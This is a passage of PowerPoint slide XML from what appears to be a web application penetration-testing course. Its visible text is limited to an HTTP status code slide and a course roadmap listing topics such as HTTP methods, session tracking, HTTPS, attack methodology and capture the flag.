              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3400870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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1661160"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Numeric Code to identify the response type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Five classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533399" y="2727960"/>
            <a:ext cx="4705351" cy="37856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ahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr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marL="914400" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>1xx Informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>100 Continue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>101 Switching Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2xx Success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>3xx Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>302 Redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>304 Not Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2727960"/>
            <a:ext cx="3931920" cy="2308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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr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marL="914400" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>4xx Client Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>401 Unauthorized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>404 File not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>5xx Server Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>500 Server Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>502 Bad Gateway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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
